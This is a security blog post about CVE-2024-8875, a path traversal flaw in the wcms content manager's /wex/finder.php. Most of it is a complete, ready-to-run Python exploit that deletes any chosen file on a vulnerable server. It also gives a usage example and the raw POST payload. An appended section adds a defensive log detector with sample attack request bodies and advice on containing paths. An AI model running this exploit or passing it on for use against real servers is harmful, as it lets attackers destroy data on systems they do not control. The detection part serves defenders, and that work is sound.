Novel Exploit — Arbitrary File Deletion in WCMS (CVE-2024-8875)

vsociety
3 min read · Oct 12, 2024

by @secatgourity

OS: Kali Linux 2024.1.*, 2020.3.*, 2019.4.*

Apps: 0.1.2.1.*, 0.0.6.1.*, 0.1.6.*, 0.1.8.*, 0.1.7.*, 0.2.8.*, 0.2.9.*, 0.0.9.*, 0.2.7.*, 0.1.4.*


Summary

In this post, we explore an arbitrary file deletion vulnerability in wcms (CVE-2024-8875). We walk through how the exploit works and how the novel exploit script deletes a file of our choosing on a vulnerable target (if the process permissions allow).

```
import argparse
import requests
import urllib3

# Disable SSL verification warning for simplicity
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def validate_url(url):
    # Accept only http:// or https:// URLs
    if not url.startswith("http://") and not url.startswith("https://"):
        raise ValueError("Invalid URL schema. Use 'http://' or 'https://'.")


def exploit(url, path):
    session = requests.Session()
    # Initial GET so the session holds the PHPSESSID cookie
    session.get(f"{url}/wcms/wex/finder.php?p=", timeout=10, verify=False)
    try:
        # POST in the same session; "p" is sent empty (payload: p=&group=1&file[]=...&delete=Delete)
        response = session.post(f"{url}/wcms/wex/finder.php?p=",
                                data={
                                    "p": "",
                                    "group": "1",
                                    "file[]": path,
                                    "delete": "Delete"
                                }, timeout=5, verify=False)
        if response.status_code == 302:
            print("[*] Specified file has been deleted (if the path was correct) and the "
                  "target was vulnerable to CVE-2024-8875.")
            return
    except requests.RequestException as e:
        print(f"[-] LOG: An error occurred during the exploitation: {e}")
    print("[-] The wcms instance seems NOT to be vulnerable to CVE-2024-8875.")


def main():
    parser = argparse.ArgumentParser(description="Novel exploit for CVE-2024-8875.")
    parser.add_argument("--url", required=True, help="URL to send requests to.")
    parser.add_argument("--path", required=True, help="File to be deleted (e.g. ../../path/to/file).")
    args = parser.parse_args()
    validate_url(args.url)
    exploit(args.url.rstrip("/"), args.path)


if __name__ == "__main__":
    main()
```

Description

Introduction

A vulnerability classified as critical was found in vedees wcms up to 0.3.2. Affected by this vulnerability is an unknown functionality of the file /wex/finder.php. The manipulation of the argument p leads to path traversal. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

Reference: https://nvd.nist.gov/vuln/detail/CVE-2024-8875

Exploitation Script Usage

```
kali@kali:/tmp$ python3 exploit.py -h
usage: exploit.py [-h] --url URL --path PATH

Novel exploit for CVE-2024-8875.

options:
-h, --help show this help message and exit
--url URL URL to send requests to.
--path PATH File to be deleted (e.g. ../../path/to/file).

kali@kali:/tmp$
```

Exploiting Vulnerable Targets

```
python3 exploit.py --url http://vuln.wcms.local --path ../../path/to/file
```

Understanding exploitation script

The exploitation script works as follows:

  1. Read user input (the URL to target and the path to the file to be deleted).
  2. The supplied URL is then validated.
  3. If the URL is valid, it is passed to the exploit() function along with the path to the file to be deleted.
  4. Next, a GET request is sent to the target to get the session id (PHPSESSID).
  5. Next, a POST request to delete a file is sent to the target (in the same HTTP request session).
  6. The following payload is sent in the POST request: p=&group=1&file%5B%5D=PATH_OF_FILE_TO_BE_DELETED&delete=Delete
  7. The file[] parameter contains the path of the file to be deleted.
  8. If the target is vulnerable, the provided file is deleted from the server, which can be verified by checking the server files.
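On the defending side, the POST described in steps 5 to 7 can be flagged wherever request bodies are recorded (for example a WAF or reverse-proxy audit log). The following is an added example, not part of the original post or of wcms: the function names and the sample records are constructed, and it assumes the body is available as a urlencoded string.

```python
import posixpath
from urllib.parse import parse_qs, unquote, urlsplit

FINDER_SUFFIX = "/wex/finder.php"  # endpoint named in the advisory text


def _decode_fully(value, max_rounds=3):
    """Undo nested percent-encoding a bounded number of times before checking."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def escapes_base(path):
    """True if a client-supplied path is absolute or climbs above its base dir."""
    path = _decode_fully(path).replace("\\", "/")
    if path.startswith("/") or "\x00" in path:
        return True
    normalized = posixpath.normpath(path)  # collapses "a/../.." to ".."
    return normalized == ".." or normalized.startswith("../")


def suspicious_delete(method, url, body):
    """Return the file[] values of a finder.php delete request that leave the base dir."""
    if method.upper() != "POST" or not urlsplit(url).path.endswith(FINDER_SUFFIX):
        return []
    form = parse_qs(body, keep_blank_values=True)  # decodes file%5B%5D to file[]
    if "delete" not in form:
        return []
    return [f for f in form.get("file[]", []) if escapes_base(f)]


# Constructed sample records (method, URL, urlencoded body), not real traffic.
SAMPLES = [
    ("POST", "http://cms.example/wcms/wex/finder.php?p=",
     "p=&group=1&file%5B%5D=..%2F..%2Fpath%2Fto%2Ffile&delete=Delete"),
    ("POST", "http://cms.example/wcms/wex/finder.php?p=",
     "p=&group=1&file%5B%5D=notes.txt&delete=Delete"),
    ("POST", "http://cms.example/wcms/wex/finder.php?p=",
     "p=&group=1&file%5B%5D=docs%252F..%252F..%252Fx&delete=Delete"),
]

if __name__ == "__main__":
    for method, url, body in SAMPLES:
        print(suspicious_delete(method, url, body) or "ok", "<-", body)
```

The same containment test (resolve the requested path, then confirm it is still under the intended directory) is what the server-side delete handler needs before it removes anything.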
